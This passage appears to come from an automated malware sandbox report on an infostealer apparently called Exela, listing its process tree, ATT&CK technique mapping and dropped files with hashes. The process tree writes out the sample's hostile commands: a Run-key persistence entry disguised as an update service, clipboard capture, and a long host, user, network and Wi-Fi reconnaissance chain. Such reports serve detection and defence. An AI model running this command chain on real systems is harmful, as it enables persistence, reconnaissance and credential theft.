    PID:5016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get Manufacturer
      4⤵
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "gdb --version"
    3⤵
    PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:5040
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
    3⤵
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path Win32_ComputerSystem get Manufacturer
      4⤵
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:1320
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
    3⤵
    PID:2288
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
      4⤵
      Adds Run key to start application
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:4048
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
    3⤵
    PID:2104
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c chcp
      4⤵
      PID:3364
    - - C:\Windows\system32\chcp.com
        
        chcp
        5⤵
        
        PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
    3⤵
    PID:3664
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c chcp
      4⤵
      PID:4868
    - - C:\Windows\system32\chcp.com
        
        chcp
        5⤵
        
        PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4712
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
    3⤵
    - Network Service Discovery
    PID:3612
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4140
  - - C:\Windows\system32\HOSTNAME.EXE
      hostname
      4⤵
      PID:2156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic logicaldisk get caption,description,providername
      4⤵
      Collects information from the system
      PID:1828
  - - C:\Windows\system32\net.exe
      net user
      4⤵
      PID:2880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        5⤵
        
        PID:2356
  - - C:\Windows\system32\query.exe
      query user
      4⤵
      PID:4856
    - - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        5⤵
        
        PID:4824
  - - C:\Windows\system32\net.exe
      net localgroup
      4⤵
      PID:4688
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        5⤵
        
        PID:4496
  - - C:\Windows\system32\net.exe
      net localgroup administrators
      4⤵
      PID:3888
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        5⤵
        
        PID:1948
  - - C:\Windows\system32\net.exe
      net user guest
      4⤵
      PID:1268
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        5⤵
        
        PID:4396
  - - C:\Windows\system32\net.exe
      net user administrator
      4⤵
      PID:2424
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        5⤵
        
        PID:696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic startup get caption,command
      4⤵
      PID:3264
  - - C:\Windows\system32\tasklist.exe
      tasklist /svc
      4⤵
      Enumerates processes with tasklist
      PID:1184
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:3712
  - - C:\Windows\system32\ROUTE.EXE
      route print
      4⤵
      PID:1508
  - - C:\Windows\system32\ARP.EXE
      arp -a
      4⤵
      Network Service Discovery
      PID:4104
  - - C:\Windows\system32\NETSTAT.EXE
      netstat -ano
      4⤵
      System Network Connections Discovery
      Gathers network information
      PID:3216
  - - C:\Windows\system32\sc.exe
      sc query type= service state= all
      4⤵
      Launches sc.exe
      PID:3668
  - - C:\Windows\system32\netsh.exe
      netsh firewall show state
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2300
  - - C:\Windows\system32\netsh.exe
      netsh firewall show config
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:644
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
111c361619c017b5d09a13a56938bd54

SHA1
e02b363a8ceb95751623f25025a9299a2c931e07

SHA256
d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

SHA512
fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
983cbc1f706a155d63496ebc4d66515e

SHA1
223d0071718b80cad9239e58c5e8e64df6e2a2fe

SHA256
cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

SHA512
d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
b432bdb7282caf591a35d7fe36b7799b

SHA1
6bf9421a24f10bd45302d7e24220f79316787bd8

SHA256
b1c46c2473d5b5b8309f127dd01ace23117c2f7513b2cdef65cc1a11c3552bb4

SHA512
20d28b1df3478328315628a462d273be85b71eb9b54b2871bcb43835d9ea5d7a03ea5c33839db9543484262c9ae084e1758c48f4ff736a0b0846238c7ec93b86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
496B

MD5
3fa79813df7f814e7c18fa9f49b4e1ff

SHA1
329dff4b8998f7794e11aac04665777d4c93243d

SHA256
ada573ddcb70ddabb54116e986707c27c8db8e1642d7f9fe72e78f180f3d7acc

SHA512
f86410fed4994a94828396955289ba41d75eb371c4aeb04c3db91b1abc0b92d690ab93d1c6832ab1403bf1d4cfd2de1d4db1f04a8a2c3e06cfcaad6222486478

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
346B

MD5
1e867bb5cc0c29c285052680cfcdb45d

SHA1
cdd6d38b933b16ef847eeddfdcde547637c2ba6d

SHA256
7e2137d5b27363d884d52361a79f96fb63222dc659a03bb378f746082b5b5758

SHA512
59cdf0110b2fa74386b93c6ccad1968861a00b80887c5428e0707cc0fa01b30a7f89bf60bb6aa0714347e958139ecc847c887afcc0517edc402163b56fe3ea69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e0ec21915a5a906c746777f8eba238cc

SHA1
f890ef282bbcce16be79ecadc4a4d1455e40455a

SHA256
dc9040bcec3cc061a612589a3dce6562fb99f830bab65edcb1f25b01586d4a55

SHA512
6537805d8bedaf1ad2cab0f56d5e9dda3c8b9c42467d1b703f3db124d3035e995943707195dafb759c0cdd0b34e745c6237d2c1b60d9de575e4aadfe821a8a2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
4aceb61bbeccd70c68d658fc264efa07

SHA1
bb3f95e71c11743f27de6ca1bba15e5089080074

SHA256
699b4e6c0d46aedceb92d1d5e862e4f17b0960b6f1b66c3721163187bb1da0a0

SHA512
58d4365d3a0c80eeae4e17f8eb8c38bf08c4ae27971734ef1f3d7791955445173292ce33fe052733d0a1b658f13641daa8a626e72e1d052345a83c8b596108ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4aeeb4aee13670fa1a8525debd42fe55

SHA1
8b92209f0f0446cb7a361d9d551f225a66e2e102

SHA256
f3fe59ab0d82b5a078d6c2b3b8c24d843347d74efe5152b41100082102726338

SHA512
d52d5e56102ea2a68ec2aa31f338820ca3000b318664642a69a94fa98b58beb4175292a7b1cea07aee9b570d9234d2df1ef831e646ce9b4ff2d7192fe78b520c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
196a6c1239d4b0eda73a6ce5bc803051

SHA1
c4c440b9f02c79a6cf1270e4187f52ebc45bd180

SHA256
20e29628997fca37b33a97e274718eea822dd7bfd123f39f88ae25f1e07859b9

SHA512
be9ede8d23401233b7b70805d08b87729920129eb36f13c3c599e80f8867fddc29c9c948cd6f2170ebcff9b189ff6d5d70bdeb212127899c008d683e8cd2818a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
096e8fe2ea1e41126f6a05a49bf1e177

SHA1
8a505f88b56799fb2d00d738096ab7f3c96f7414

SHA256
fa699fd4e94ba324977e86044a8cd71e5f47d53708b02a1b88c3e8e1c93ba664

SHA512
ae288dc2c77d700d3bed16a80ef4553c6c315171a4371ff59dc6c46d7590474d32b8b67654e0b597fb3ec5757e6152d161a560ed419e6bf029c8f44d3a0406cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5894f8.TMP

Filesize
203B

MD5
f426c8d4b715417fde5023c0761ef083

SHA1
8332a76c8e77a05974f45589292ef203e44b0614

SHA256
1668739b6e56fd5dafb98d919d671753b9c25994a62168fb75d4c02a563d015b

SHA512
d4d036079b880b82242792c3677033cdab390c318b1a8cc0d3dcaee85dfb3f1ce25da1f05d3740abff62ee0e2ba97015d7030a28ebbb322df2ddeab8a8f03355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
32f1acbd25830225ba1d8a474c942a58

SHA1
58d778dee11f36a2263d117eb204f03bf1318ce8

SHA256
09a92a96ac52613d764dc947c4ab1afe574195fbc781f69fead46ef45e72d5ed

SHA512
36ace06262f94cb08566bcdf4b3aa8ab3e2df4f18695914be89c2106930b4d55afb1aabbecd550927d5c235bc56a2307f989959497f3cc938770fcfa157861fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
746f2052135d103425cfea756247f9c2

SHA1
22f9d0e8ad075a7833e2d91eafcc3ec2a3b645fa

SHA256
2ab1043ef2e883cde9eea7a1a1de227c1d3c9ad06fc60d3f806b436e88b483b8

SHA512
baa494d731c67b9590276efac8efc5b07087e91648880663024d28510f5c816aa0c0de8874d5fd600c82526bb944fe99d7a0db0b4828ec7d26ea9a4ab2c2f2fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE

Filesize
10.2MB

MD5
8c34772125f9ed13bef37df0fc2aaafb

SHA1
9cbdf3b7a9e1bc3e1ce276271d331e4f390f0183

SHA256
9cfa4a85a82be1cd3963842de04087c42608d9fd298fd7f4785b6a2c0d723964

SHA512
1c242b5267df19955a3d3be011fbc6e16dfd1bdb20b6ccf6a0056458c26bc9e73ff69c041eb5f7aa294fdad7ae7a48c5afc79e886e13696bab6e72b8145e17c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies.db

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\HistoryData.db

Filesize
124KB

MD5
e4b15b4fbd4262c46dbf99eb1acb75e7

SHA1
51a27f9a13f1582c212e4457187db3a8da507f50

SHA256
ea6f0ef0b70f447e69bc5630fff8ca94f5673871c4f36e0eebf3ab5c75d60d7a

SHA512
ae282eb1522698995fa247cc84c95d1b83fa48d2493f724c2f133eb7c551de8a1bc7aceb290cdabee4bccbf1348f1371772965eb2bf4c49dc297e0b881aba3a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\HistoryData.db

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Logins.db

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Logins.db

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE

Filesize
17.2MB

MD5
dce61b2411fe54283190a24b67ffa453

SHA1
5fb001738e4459883facca64788ccb9b33d6c75c

SHA256
67bca757a53ad6baca920a0eb69f6cd7e335a688194691996c41b03f9e87ee9d

SHA512
e169718e957fa61f773c5d4ed4b5b6ca4debd5016c1aecf17a9563617b760073d97dc0109a826637a4bc4c5b83fecdc52dee5ab5e128ea996232e86704f2e6ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\VCRUNTIME140.dll

Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\_ctypes.pyd

Filesize
53KB

MD5
b1f12f4bfc0bd49a6646a0786bc5bc00

SHA1
acb7d8c665bb8ca93e5f21e178870e3d141d7cbc

SHA256
1fe61645ed626fc1dec56b2e90e8e551066a7ff86edbd67b41cb92211358f3d7

SHA512
a3fb041bd122638873c395b95f1a541007123f271572a8a988c9d01d2b2d7bb20d70e1d97fc3abffd28cb704990b41d8984974c344faea98dd0c6b07472b5731

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
e8b9d74bfd1f6d1cc1d99b24f44da796

SHA1
a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452

SHA256
b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59

SHA512
b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
cfe0c1dfde224ea5fed9bd5ff778a6e0

SHA1
5150e7edd1293e29d2e4d6bb68067374b8a07ce6

SHA256
0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e

SHA512
b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
33bbece432f8da57f17bf2e396ebaa58

SHA1
890df2dddfdf3eeccc698312d32407f3e2ec7eb1

SHA256
7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e

SHA512
619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
eb0978a9213e7f6fdd63b2967f02d999

SHA1
9833f4134f7ac4766991c918aece900acfbf969f

SHA256
ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e

SHA512
6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
efad0ee0136532e8e8402770a64c71f9

SHA1
cda3774fe9781400792d8605869f4e6b08153e55

SHA256
3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed

SHA512
69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
e89cdcd4d95cda04e4abba8193a5b492

SHA1
5c0aee81f32d7f9ec9f0650239ee58880c9b0337

SHA256
1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238

SHA512
55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
accc640d1b06fb8552fe02f823126ff5

SHA1
82ccc763d62660bfa8b8a09e566120d469f6ab67

SHA256
332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f

SHA512
6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
c6024cc04201312f7688a021d25b056d

SHA1
48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd

SHA256
8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500

SHA512
d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
1f2a00e72bc8fa2bd887bdb651ed6de5

SHA1
04d92e41ce002251cc09c297cf2b38c4263709ea

SHA256
9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142

SHA512
8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
3c38aac78b7ce7f94f4916372800e242

SHA1
c793186bcf8fdb55a1b74568102b4e073f6971d6

SHA256
3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d

SHA512
c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
321a3ca50e80795018d55a19bf799197

SHA1
df2d3c95fb4cbb298d255d342f204121d9d7ef7f

SHA256
5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f

SHA512
3ec20e1ac39a98cb5f726d8390c2ee3cd4cd0bf118fdda7271f7604a4946d78778713b675d19dd3e1ec1d6d4d097abe9cd6d0f76b3a7dff53ce8d6dbc146870a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
0462e22f779295446cd0b63e61142ca5

SHA1
616a325cd5b0971821571b880907ce1b181126ae

SHA256
0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e

SHA512
07b34dca6b3078f7d1e8ede5c639f697c71210dcf9f05212fd16eb181ab4ac62286bc4a7ce0d84832c17f5916d0224d1e8aab210ceeff811fc6724c8845a74fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
c3632083b312c184cbdd96551fed5519

SHA1
a93e8e0af42a144009727d2decb337f963a9312e

SHA256
be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125

SHA512
8807c2444a044a3c02ef98cf56013285f07c4a1f7014200a21e20fcb995178ba835c30ac3889311e66bc61641d6226b1ff96331b019c83b6fcc7c87870cce8c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15402\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
f3ff2d544f5cd9e66bfb8d170b661673

SHA1
9e18107cfcd89f1bbb7fdaf65234c1dc8e614add

SHA256
e1c5d8984a674925fa4afbfe58228be5323fe5123abcd17ec4160295875a625f

SHA512
184b09c77d079127580ef80eb34bded0f5e874cefbe1c5f851d86861e38967b995d859e8491fcc87508930dc06c6bbf02b649b3b489a1b138c51a7d4b4e7aaad

Download Submit
